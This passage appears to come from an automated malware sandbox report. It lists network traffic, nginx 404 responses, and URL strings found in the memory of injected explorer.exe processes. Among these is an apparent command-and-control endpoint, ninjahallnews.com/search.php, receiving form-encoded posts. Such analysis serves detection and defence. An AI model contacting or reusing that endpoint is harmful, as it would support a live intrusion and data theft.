    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:15:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:15:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 01:16:17 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 01:16:24 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 01:16:34 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 01:16:47 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 01:17:02 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 01:17:20 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 01:17:38 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 08 Oct 2024 01:17:56 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714214709.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714214709.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714214709.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714214709.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mi
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.micr
    Source: explorer.exe, 00000001.00000000.1714950006.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1713787801.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1713291422.0000000007F40000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: explorer.exe, 00000001.00000000.1716416454.000000000C893000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/Vh5j3k
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/odirmr
    Source: explorer.exe, 00000001.00000000.1716416454.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
    Source: explorer.exe, 00000001.00000000.1714214709.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
    Source: explorer.exe, 00000001.00000000.1714214709.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/q
    Source: explorer.exe, 00000001.00000000.1711147708.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1711733721.0000000003700000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 00000001.00000000.1714214709.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
    Source: explorer.exe, 00000001.00000000.1714214709.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
    Source: explorer.exe, 00000001.00000000.1714214709.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.comi
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: explorer.exe, 00000001.00000000.1716416454.000000000C5E6000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2750919806.0000000002DDC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ninjahallnews.com/
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002DC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ninjahallnews.com/application/x-www-form-urlencodedMozilla/5.0
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ninjahallnews.com/earch.php
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002DC4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2750919806.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2708231092.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4124446936.0000000002847000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4124446551.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4124735208.0000000003287000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.4124374617.0000000000588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ninjahallnews.com/search.php
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ninjahallnews.com/search.php(
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2708231092.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4124446936.0000000002847000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4124446551.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4124735208.0000000003287000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.4124374617.0000000000588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ninjahallnews.com/search.phpMozilla/5.0
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002D50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ninjahallnews.com/search.phpb
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ninjahallnews.com:443/search.phpge
    Source: explorer.exe, 00000001.00000000.1716416454.000000000C5E6000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com_
    Source: explorer.exe, 00000001.00000000.1716416454.000000000C5E6000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comcember
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000001.00000000.1716416454.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
    Source: explorer.exe, 00000001.00000000.1716416454.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drString found in binary or memory: https://www.ecosia.org/newtab/
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49942
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49941
    Source: unknown | Network traffic detected: HTTP traffic on port 50036 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 50061 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49983
    Source: unknown | Network traffic detected: HTTP traffic on port 49951 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 50055 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50055
    Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50015
    Source: unknown | Network traffic detected: HTTP traffic on port 49935 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50061
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50060
    Source: unknown | Network traffic detected: HTTP traffic on port 49965 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50063
    Source: unknown | Network traffic detected: HTTP traffic on port 49942 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49977 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49935
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49977
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49971
    Source: unknown | Network traffic detected: HTTP traffic on port 50060 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 50008 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49971 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50065
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50067
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50024
    Source: unknown | Network traffic detected: HTTP traffic on port 49915 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50030
    Source: unknown | Network traffic detected: HTTP traffic on port 50067 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49924
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49965
    Source: unknown | Network traffic detected: HTTP traffic on port 49924 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49995 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 50063 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknown | Network traffic detected: HTTP traffic on port 50015 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49989 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50036
    Source: unknown | Network traffic detected: HTTP traffic on port 50001 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 50024 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 50043 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49959
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49915
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49951
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49995
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50008
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50043
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50001
    Source: unknown | Network traffic detected: HTTP traffic on port 49959 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49983 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 50030 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49941 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 50065 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49989
    Source: unknown | HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49762 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49915 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49924 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49935 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49942 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49951 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49959 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49965 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49971 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49977 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49983 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49989 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49995 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50001 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50008 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50015 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50024 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50030 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50036 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50043 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50055 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50060 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50061 version: TLS 1.2
